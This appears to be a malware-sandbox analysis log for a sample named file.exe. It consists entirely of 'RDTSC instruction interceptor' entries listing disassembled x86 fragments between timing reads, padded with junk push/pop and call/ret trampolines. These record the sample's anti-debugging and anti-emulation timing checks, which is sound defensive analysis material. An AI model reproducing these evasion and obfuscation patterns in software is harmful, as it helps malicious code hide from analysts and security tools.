Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24F48 second address: B24FD2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F0AD8C6A9B8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jmp 00007F0AD8C6A9C7h 0x00000027 push 00000000h 0x00000029 add edi, 7ED3A103h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F0AD8C6A9B8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b sub edi, 6EFFF232h 0x00000051 mov bh, 15h 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 jbe 00007F0AD8C6A9B8h 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F0AD8C6A9BEh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B25E96 second address: B25F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F0AD95F8833h 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov di, A1D5h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F0AD95F8828h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 jmp 00007F0AD95F882Bh 0x00000037 push 00000000h 0x00000039 xor dword ptr [ebp+122DB8AFh], eax 0x0000003f push eax 0x00000040 pushad 0x00000041 push esi 0x00000042 jmp 00007F0AD95F8833h 0x00000047 pop esi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F0AD95F882Ah 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B26D9B second address: B26DA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B26DA1 second address: B26DAB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B260C1 second address: B26131 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F0AD8C6A9B6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F0AD8C6A9B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2E64h], ecx 0x0000002d mov bx, cx 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jnp 00007F0AD8C6A9BCh 0x0000003d add dword ptr [ebp+122D1894h], ecx 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a or dword ptr [ebp+122D339Fh], edx 0x00000050 mov eax, dword ptr [ebp+122D10E9h] 0x00000056 sbb di, CE16h 0x0000005b mov ebx, dword ptr [ebp+122D2BDDh] 0x00000061 push FFFFFFFFh 0x00000063 stc 0x00000064 nop 0x00000065 pushad 0x00000066 jnc 00007F0AD8C6A9BCh 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B26EEC second address: B26F0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0AD95F8835h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B26F0D second address: B26F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B26FD0 second address: B26FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2A176 second address: B2A17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B281C4 second address: B281C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2E34E second address: B2E352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2E352 second address: B2E36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD95F8835h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2F1E0 second address: B2F1FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0AD8C6A9B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2A4A5 second address: B2A4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2C45E second address: B2C4E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov edi, 2734DDEBh 0x00000016 sub dword ptr [ebp+122D1AB2h], esi 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov bx, CE72h 0x00000027 mov eax, dword ptr [ebp+122D04BDh] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F0AD8C6A9B8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 sbb bh, FFFFFF9Ah 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edx 0x0000004f call 00007F0AD8C6A9B8h 0x00000054 pop edx 0x00000055 mov dword ptr [esp+04h], edx 0x00000059 add dword ptr [esp+04h], 0000001Dh 0x00000061 inc edx 0x00000062 push edx 0x00000063 ret 0x00000064 pop edx 0x00000065 ret 0x00000066 nop 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3016A second address: B3016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D477 second address: B2D47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2E468 second address: B2E47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F0AD95F882Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2C4E7 second address: B2C4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3016E second address: B301F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0AD95F8828h 0x0000000c popad 0x0000000d push eax 0x0000000e je 00007F0AD95F8836h 0x00000014 jmp 00007F0AD95F8830h 0x00000019 nop 0x0000001a pushad 0x0000001b mov dl, C1h 0x0000001d mov dword ptr [ebp+122D339Fh], ebx 0x00000023 popad 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F0AD95F8828h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 xor dword ptr [ebp+122D1CF2h], edx 0x00000046 push 00000000h 0x00000048 sub dword ptr [ebp+122D34B1h], eax 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 jmp 00007F0AD95F882Bh 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F0AD95F8833h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2E47C second address: B2E481 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B301F3 second address: B30200 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D557 second address: B2D55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D55B second address: B2D583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8833h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F882Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B350BF second address: B350CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0AD8C6A9B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B394BB second address: B394C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F0AD95F8826h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF384 second address: ADF39A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF39A second address: ADF3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF3A2 second address: ADF3AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C41 second address: B38C5E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0AD95F882Fh 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C5E second address: B38C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C62 second address: B38C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C68 second address: B38C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C6E second address: B38C78 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0AD95F8832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C78 second address: B38C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0AD8C6A9B6h 0x0000000a jnp 00007F0AD8C6A9BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38DC0 second address: B38DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F75D second address: B3F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F763 second address: B3F770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F770 second address: B3F776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F776 second address: B3F793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F0AD95F882Fh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F793 second address: B3F7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0AD8C6A9C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F854 second address: B3F85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0AD95F8826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F85E second address: B3F893 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 jnl 00007F0AD8C6A9B8h 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e je 00007F0AD8C6A9DEh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0AD8C6A9BDh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F950 second address: B3F968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F968 second address: B3F96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43D98 second address: B43D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B441C8 second address: B441FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f push edx 0x00000010 je 00007F0AD8C6A9B6h 0x00000016 pop edx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b jmp 00007F0AD8C6A9C2h 0x00000020 pop ebx 0x00000021 ja 00007F0AD8C6A9BEh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B441FE second address: B44204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4436C second address: B44373 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B44373 second address: B4437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4437C second address: B44380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4476E second address: B44774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B44774 second address: B4477E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0AD8C6A9B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4477E second address: B4479D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0AD95F8836h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DC7B second address: B4DCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007F0AD8C6A9BEh 0x0000000c pop ebx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0AD8C6A9C4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DCA9 second address: B4DCAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DCAD second address: B4DCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DCB1 second address: B4DCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8831h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F8836h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DCE2 second address: B4DCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4CD1D second address: B4CD27 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4CFE9 second address: B4CFED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4CFED second address: B4D015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8839h 0x0000000b pushad 0x0000000c jns 00007F0AD95F8826h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D173 second address: B4D19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0AD8C6A9C9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D19A second address: B4D1A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D1A1 second address: B4D1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0AD8C6A9BFh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D4B2 second address: B4D4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0AD95F882Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DAF4 second address: B4DAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DAF8 second address: B4DB02 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DB02 second address: B4DB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B50DA4 second address: B50DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B55E42 second address: B55E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0AD8C6A9BAh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B177C4 second address: B177CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B17CF9 second address: 96DB7E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0AD8C6A9BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D37EBh], edi 0x00000013 push dword ptr [ebp+122D1595h] 0x00000019 mov dx, 2BEBh 0x0000001d call dword ptr [ebp+122D3589h] 0x00000023 pushad 0x00000024 jng 00007F0AD8C6A9BCh 0x0000002a mov dword ptr [ebp+122D34B1h], eax 0x00000030 xor eax, eax 0x00000032 jmp 00007F0AD8C6A9BEh 0x00000037 add dword ptr [ebp+122D34B1h], ebx 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 or dword ptr [ebp+122D34B1h], ebx 0x00000047 add dword ptr [ebp+122D34B1h], edi 0x0000004d mov dword ptr [ebp+122D29C9h], eax 0x00000053 mov dword ptr [ebp+122D34B1h], edi 0x00000059 mov esi, 0000003Ch 0x0000005e mov dword ptr [ebp+122D2E75h], edx 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 jg 00007F0AD8C6A9B7h 0x0000006e lodsw 0x00000070 jmp 00007F0AD8C6A9C2h 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jmp 00007F0AD8C6A9BEh 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D34B1h], edi 0x00000088 push eax 0x00000089 pushad 0x0000008a push esi 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1808D second address: B180BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F0AD95F883Dh 0x00000010 pushad 0x00000011 jmp 00007F0AD95F882Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1833B second address: B18341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18341 second address: B18348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18348 second address: B183AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0AD8C6A9B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jg 00007F0AD8C6A9BCh 0x0000002a push 00000004h 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D27B2h], edi 0x00000033 mov ax, di 0x00000036 popad 0x00000037 nop 0x00000038 jnp 00007F0AD8C6A9C8h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jnc 00007F0AD8C6A9B6h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18A45 second address: B18A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18A4A second address: B18A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
